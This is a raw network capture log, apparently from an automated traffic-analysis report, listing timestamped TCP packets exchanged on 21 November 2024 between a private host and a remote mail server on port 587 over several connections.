                                                          Nov 21, 2024 09:02:15.385477066 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:15.728729010 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:15.729406118 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:15.849256039 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.194008112 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.194056034 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.194066048 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.194077015 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.194107056 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:16.194147110 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:16.198951006 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:16.319300890 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.662602901 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:16.668442011 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:16.788022995 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:17.131298065 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:17.132798910 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:17.252346992 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:17.595635891 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:17.618459940 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:17.759133101 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:18.101485014 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:18.102026939 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:18.221621037 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:18.573554993 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:18.573928118 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:18.693618059 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.132455111 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.132832050 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:19.252782106 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.595820904 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.599841118 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:19.599904060 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:19.600002050 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:19.600002050 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:19.719574928 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.719605923 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.719619036 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:19.719736099 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:20.358278990 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:20.407576084 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:20.506309032 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:20.626302958 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:20.969705105 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:20.969726086 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:20.969791889 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:20.970859051 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:20.973140955 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:21.090601921 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:21.092720985 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:21.092808008 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:22.464337111 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:22.464531898 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:22.584048986 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:22.924563885 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:22.924829006 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:23.044441938 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.384685040 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.385130882 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:23.504688978 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.847640038 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.847657919 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.847665071 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.847671032 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:23.847769976 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:23.850119114 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:23.969657898 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:24.310590029 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:24.311980963 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:24.431652069 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:24.772002935 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:24.772402048 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:24.891865969 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:25.232701063 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:25.233083010 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:25.352571011 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:25.721448898 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:25.721807003 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:25.841449022 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:26.199862003 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:26.200144053 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:26.320738077 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:26.771594048 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:26.771950006 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:26.891499996 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.232161999 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.236428976 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236491919 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236536980 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236573935 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236624956 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236666918 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236702919 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236726046 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236753941 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.236773014 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:27.356188059 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356204987 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356224060 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356234074 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356249094 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356298923 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356441975 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356451035 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356482029 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:27.356492043 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:29.144751072 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:29.188853025 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:44.145246029 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:44.145296097 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:46.304550886 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:46.304807901 CET49747587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:46.305830956 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:46.424801111 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:46.424818039 CET5874974777.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:46.425822973 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:46.426017046 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:47.723155975 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:47.723365068 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:47.843013048 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:48.170960903 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:48.171999931 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:48.330328941 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:48.619554043 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:48.621001959 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:48.740773916 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.070079088 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.070142031 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.070162058 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.070197105 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.070247889 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:49.070377111 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:49.073510885 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:49.193742037 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.521733046 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:49.555438995 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:49.675028086 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.003305912 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.003571987 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:50.123985052 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.451447964 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.451812983 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:50.571383953 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.935622931 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:50.966419935 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:51.085900068 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:51.425801039 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:51.428677082 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:51.548588991 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:51.972928047 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:51.973164082 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.093024969 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.421019077 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.421489000 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.421574116 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.421648979 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.421699047 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.423192024 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.541217089 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.541281939 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.541311026 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.541311979 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.541338921 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.541407108 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.542717934 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.542793989 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.542813063 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.542826891 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.542851925 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.542882919 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.542896032 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.542927980 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.542951107 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.542980909 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.542994022 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.543041945 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.543044090 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.543090105 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.543117046 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.543148041 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.543204069 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.543204069 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.661010981 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.661032915 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.662379026 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.662564039 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.662678957 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.662818909 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.662878036 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.662962914 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.663110018 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.663141966 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.663175106 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.663285971 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.663330078 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.670758963 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:52.782479048 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.782546043 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.782648087 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.782814026 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.782924891 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783030033 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783113003 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783233881 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783301115 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783397913 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783489943 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783586025 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783611059 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783685923 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783726931 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783823013 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783840895 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.783919096 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.790474892 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.790504932 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.790518045 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.790565968 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:52.790653944 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:53.637260914 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:53.782692909 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:55.690407991 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:55.810003042 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:56.138170958 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:56.138190985 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:56.138339043 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:56.138708115 CET49940587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:56.139955044 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:56.258188009 CET5874994077.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:56.259457111 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:56.259530067 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:57.559294939 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:57.559839964 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:57.679430008 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:58.012135029 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:58.012548923 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:58.132051945 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:58.464906931 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:58.465414047 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:58.584918976 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:58.919836998 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:58.919926882 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:58.919941902 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:58.919950008 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:58.920085907 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:58.920284033 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:58.921869993 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:59.041287899 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:59.374489069 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:59.380672932 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:59.500277042 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:59.832920074 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:03:59.833256006 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:03:59.953633070 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:00.286849022 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:00.287136078 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:00.406811953 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:00.764205933 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:00.764506102 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:00.884005070 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:01.229763985 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:01.232952118 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:01.352914095 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:01.693579912 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:01.693844080 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:01.813441992 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.146207094 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.146814108 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.146874905 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.146904945 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.146955013 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.148390055 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.266356945 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.266395092 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.266406059 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.266412020 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.266522884 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.266558886 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.267890930 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.267913103 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.267960072 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.267983913 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.268013000 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.268052101 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.268054962 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.268093109 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.268129110 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.268148899 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.268168926 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.268189907 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.268193960 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.268233061 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.268279076 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.268313885 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.268381119 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.268423080 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.385961056 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.386077881 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.386092901 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.386141062 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.387550116 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.387562990 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.387634039 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.387670040 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.387734890 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.387839079 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.387887955 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.388037920 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.388088942 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.388191938 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.388235092 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.388247013 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.388283014 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.388313055 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.388365030 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:02.388468027 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.429914951 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.505687952 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.505728006 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.507342100 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.507469893 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.507632017 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.507822037 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.507976055 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508066893 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508150101 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508295059 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508430958 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508625031 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508661985 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508739948 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508790970 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508850098 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508868933 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508979082 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.508999109 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.509090900 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.509100914 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.509232998 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:02.509282112 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:03.424438000 CET5874996577.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:04:03.470338106 CET49965587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:04:34.858362913 CET49965587192.168.2.677.88.21.158
